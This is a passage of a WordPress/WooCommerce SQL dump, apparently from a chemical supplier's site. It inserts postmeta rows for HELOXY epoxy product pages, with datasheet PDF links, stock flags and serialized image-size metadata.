INSERT INTO `wp_postmeta` VALUES (13712, 1217, '_wp_attached_file', '2016/09/heloxy-62.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13713, 1216, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13714, 1216, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13715, 1216, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13716, 1216, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13717, 1216, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13718, 1216, '318_custom_list_file', 'a:2:{s:32:"c3a5f1c6cee68641d2b177489d317c91";a:3:{s:4:"name";s:9:"HELOXY 62";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/heloxy-62.pdf";s:4:"desc";s:13:"HELOXY 62 TDS";}s:32:"c78e106104e2bb32291acf067cc01211";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13719, 1216, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13720, 1216, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13721, 1216, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13722, 1216, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13723, 1216, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13724, 1216, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13725, 1216, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13726, 1216, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13727, 1216, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13728, 1216, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13729, 1216, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13730, 1216, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13731, 1216, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13732, 1216, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13733, 1216, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13734, 1216, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13735, 1216, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13736, 1216, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13737, 1216, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13738, 1216, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13739, 1216, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13740, 1216, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13741, 1216, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13742, 1216, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13743, 1216, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13744, 1216, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13745, 1216, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13746, 1216, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13747, 1216, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13748, 1216, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13749, 1216, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13750, 1218, '_wp_attached_file', '2016/09/opteon-solvent-banner.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13751, 1218, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:33:"2016/09/opteon-solvent-banner.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"opteon-solvent-banner-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"opteon-solvent-banner-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"opteon-solvent-banner-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"opteon-solvent-banner-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"opteon-solvent-banner-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"opteon-solvent-banner-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"opteon-solvent-banner-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13752, 1218, '_edit_lock', '1472840240:2'); 
INSERT INTO `wp_postmeta` VALUES (13755, 1218, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13756, 1220, '_wp_attached_file', '2016/09/HELOXY-polyfunctional.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13757, 1220, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:33:"2016/09/HELOXY-polyfunctional.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"HELOXY-polyfunctional-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"HELOXY-polyfunctional-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"HELOXY-polyfunctional-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"HELOXY-polyfunctional-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"HELOXY-polyfunctional-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"HELOXY-polyfunctional-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"HELOXY-polyfunctional-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"HELOXY-polyfunctional-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13758, 1221, '_edit_lock', '1474650590:3'); 
INSERT INTO `wp_postmeta` VALUES (13759, 1221, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13760, 1222, '_wp_attached_file', '2016/09/heloxy-48.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13761, 1221, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13762, 1221, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13763, 1221, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13764, 1221, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13765, 1221, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13766, 1221, '318_custom_list_file', 'a:2:{s:32:"eba9f562371cbe286e39ba9de852a6af";a:3:{s:4:"name";s:9:"HELOXY 48";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/heloxy-48.pdf";s:4:"desc";s:13:"HELOXY 48 TDS";}s:32:"c78e106104e2bb32291acf067cc01211";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13767, 1221, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13768, 1221, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13769, 1221, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13770, 1221, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13771, 1221, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13772, 1221, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13773, 1221, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13774, 1221, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13775, 1221, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13776, 1221, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13777, 1221, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13778, 1221, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13779, 1221, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13780, 1221, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13781, 1221, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13782, 1221, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13783, 1221, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13784, 1221, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13785, 1221, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13786, 1221, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13787, 1221, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13788, 1221, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13789, 1221, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13790, 1221, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13791, 1221, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13792, 1221, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13793, 1221, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13794, 1221, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13795, 1221, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13796, 1221, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13797, 1223, '_wp_attached_file', '2016/09/miller-stephenson-banner-1-e1472843405488.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13798, 1223, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:53:"2016/09/miller-stephenson-banner-1-e1472843405488.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:52:"miller-stephenson-banner-1-e1472843405488-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:52:"miller-stephenson-banner-1-e1472843405488-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:52:"miller-stephenson-banner-1-e1472843405488-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:52:"miller-stephenson-banner-1-e1472843405488-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:52:"miller-stephenson-banner-1-e1472843405488-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:52:"miller-stephenson-banner-1-e1472843405488-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:52:"miller-stephenson-banner-1-e1472843405488-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13799, 1223, '_edit_lock', '1472844343:2'); 
INSERT INTO `wp_postmeta` VALUES (13800, 1223, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:30:"miller-stephenson-banner-1.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:37:"miller-stephenson-banner-1-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:37:"miller-stephenson-banner-1-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:37:"miller-stephenson-banner-1-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:37:"miller-stephenson-banner-1-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:37:"miller-stephenson-banner-1-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:37:"miller-stephenson-banner-1-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13801, 1223, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13802, 1224, '_edit_lock', '1474470332:2'); 
INSERT INTO `wp_postmeta` VALUES (13803, 1224, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13804, 1226, '_wp_attached_file', '2016/09/heloxy-68.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13805, 1224, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13806, 1224, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13807, 1224, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13808, 1224, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13809, 1224, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13810, 1224, '318_custom_list_file', 'a:2:{s:32:"0582119d65ec8001d71ecc6daae2bf58";a:3:{s:4:"name";s:9:"HELOXY 68";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/heloxy-68.pdf";s:4:"desc";s:13:"HELOXY 68 TDS";}s:32:"c78e106104e2bb32291acf067cc01211";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13811, 1224, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13812, 1224, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13813, 1224, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13814, 1224, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13815, 1224, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13816, 1224, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13817, 1224, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13818, 1224, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13819, 1224, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13820, 1224, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13821, 1224, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13822, 1224, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13823, 1224, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13824, 1224, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13825, 1224, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13826, 1224, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13827, 1224, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13828, 1224, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13829, 1224, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13830, 1224, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13831, 1224, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13832, 1224, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13833, 1224, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13834, 1224, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13835, 1224, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13836, 1224, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13837, 1224, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13838, 1224, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13839, 1224, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13840, 1224, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13841, 1227, '_edit_lock', '1480020388:3'); 
INSERT INTO `wp_postmeta` VALUES (13842, 1227, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13843, 1228, '_wp_attached_file', '2016/09/heloxy-107.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13844, 1227, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13845, 1227, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13846, 1227, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13847, 1227, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13848, 1227, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13849, 1227, '318_custom_list_file', 'a:2:{s:32:"84e7c9684fad8eda1f9702e28f310577";a:3:{s:4:"name";s:10:"HELOXY 107";s:4:"file";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/heloxy-107.pdf";s:4:"desc";s:14:"HELOXY 107 TDS";}s:32:"f37e7788ae15521b493ecd57ee713aae";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13850, 1227, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13851, 1227, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13852, 1227, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13853, 1227, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13854, 1227, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13855, 1227, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13856, 1227, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13857, 1227, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13858, 1227, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13859, 1227, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13860, 1227, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13861, 1227, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13862, 1227, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13863, 1227, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13864, 1227, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13865, 1227, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13866, 1227, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13867, 1227, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13868, 1227, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13869, 1227, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13870, 1227, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13871, 1227, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13872, 1227, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13873, 1227, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13874, 1227, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13875, 1227, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13876, 1227, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13877, 1227, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13878, 1227, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13879, 1227, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13880, 1229, '_wp_attached_file', '2016/09/HELOXY-flexibilizers.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13881, 1229, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3514;s:6:"height";i:2144;s:4:"file";s:32:"2016/09/HELOXY-flexibilizers.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"HELOXY-flexibilizers-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"HELOXY-flexibilizers-800x488.jpg";s:5:"width";i:800;s:6:"height";i:488;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"HELOXY-flexibilizers-768x469.jpg";s:5:"width";i:768;s:6:"height";i:469;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"HELOXY-flexibilizers-1600x976.jpg";s:5:"width";i:1600;s:6:"height";i:976;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"HELOXY-flexibilizers-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"HELOXY-flexibilizers-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"HELOXY-flexibilizers-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"HELOXY-flexibilizers-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13882, 1230, '_edit_lock', '1480020259:3'); 
INSERT INTO `wp_postmeta` VALUES (13883, 1230, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13884, 1231, '_wp_attached_file', '2016/09/heloxy-71.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13885, 1232, '_wp_attached_file', '2016/09/conformal-coatings-e1472844578345.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13886, 1232, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:45:"2016/09/conformal-coatings-e1472844578345.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844578345-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844578345-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844578345-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844578345-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844578345-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844578345-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844578345-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed"